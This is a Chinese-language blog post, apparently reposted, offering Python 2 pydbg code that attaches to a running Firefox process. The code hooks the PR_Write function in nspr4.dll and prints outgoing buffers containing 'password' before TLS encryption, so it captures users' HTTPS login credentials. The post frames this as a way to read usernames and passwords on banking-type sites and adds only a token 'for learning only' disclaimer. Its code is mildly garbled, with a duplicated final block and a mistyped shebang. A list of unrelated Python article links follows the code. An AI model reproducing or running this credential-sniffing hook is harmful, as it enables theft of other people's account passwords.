python利用hook技術破解https的實例代碼
相對于http協(xié)議,http是的特點就是他的安全性,http協(xié)議的通信內容用普通的嗅探器可以捕捉到,但是https協(xié)議的內容嗅探到的是加密后的內容,對我們的利用價值不是很高,所以一些大的網(wǎng)站----涉及到“大米”的網(wǎng)站,采用的都是http是協(xié)議,嘿嘿,即便這樣,還是有辦法能看到他的用戶名和密碼的,嘿嘿,本文只是用于技術學習,只是和大家交流技術,希望不要用于做違法的事情,這個例子是在firefox瀏覽器下登錄https協(xié)議的網(wǎng)站,我們預先打開程序,就來了個捕獲用戶名和密碼:
下面是源代碼:
#!/ur/bin/env python
from pydbg import *
from pydbg.defines import *
import utils
import sys
dbg = pydbg()
found_firefox = False
pattern = "password"
def ssl_sniff( dbg, args ):
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory( args[1] + offset, 1 )
if byte != "x00":
buffer += byte
offset += 1
continue
else:
break
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
return DBG_CONTINUE
# 尋找firefox.exe的進程
for (pid, name) in dbg.enumerate_processes():
if name.lower() == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
dbg.attach(pid)
print "[*] Attaching to firefox.exe with PID: %d" % pid
# 得到firefox的hook的 address
hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
if hook_address:
# 添加hook的內容,包括他的pid,地址,嗅探類型
hooks.add( dbg, hook_address, 2, ssl_sniff, None )
print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
break
else:
print "[*] Error: Couldn't resolve hook address."
sys.exit(-1)
if found_firefox:
print "[*] Hooks set, continuing process."
dbg.run()
else:
print "[*] Error: Couldn't find the firefox.exe process."
sys.exit(-1)
if found_firefox:
print "[*] Hooks set, continuing process."
dbg.run()
else:
print "[*] Error: Couldn't find the firefox.exe process."
sys.exit(-1)
轉自:http://world77.blog.51cto.com/414605/518679
相關文章
如何使用python讀取Excel指定范圍并轉為數(shù)組
python處理數(shù)據(jù)文件的途徑有很多種,下面這篇文章主要給大家介紹了關于如何使用python讀取Excel指定范圍并轉為數(shù)組的相關資料,文中通過圖文以及實例代碼介紹的非常詳細,需要的朋友可以參考下2022-11-11tensorflow轉換ckpt為savermodel模型的實現(xiàn)
這篇文章主要介紹了tensorflow轉換ckpt為savermodel模型的實現(xiàn),具有很好的參考價值,希望對大家有所幫助,一起跟隨小編過來看看吧2020-05-05Python3使用Matplotlib 繪制精美的數(shù)學函數(shù)圖形
這篇文章主要介紹了Python3使用Matplotlib 繪制精美的數(shù)學函數(shù)圖形,非常不錯,具有一定的參考借鑒價值,需要的朋友可以參考下2019-04-04python中的opencv和PIL(pillow)轉化操作
這篇文章主要介紹了python中的opencv和PIL(pillow)轉化操作,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2021-03-03pytorch:torch.mm()和torch.matmul()的使用
今天小編就為大家分享一篇pytorch:torch.mm()和torch.matmul()的使用,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2019-12-12Pytorch根據(jù)layers的name凍結訓練方式
今天小編就為大家分享一篇Pytorch根據(jù)layers的name凍結訓練方式,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2020-01-01Python統(tǒng)計可散列的對象之容器Counter詳解
Counter是一個容器,可以跟蹤等效值增加的次數(shù).這個類可以用來實現(xiàn)其他語言中常用包或多集合數(shù)據(jù)結構實現(xiàn)的算法.本篇文章非常詳細的介紹了容器Counter的使用方式,需要的朋友可以參考下2021-05-05python輸入、數(shù)據(jù)類型轉換及運算符方式
這篇文章主要介紹了python輸入、數(shù)據(jù)類型轉換及運算符方式,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教2022-07-07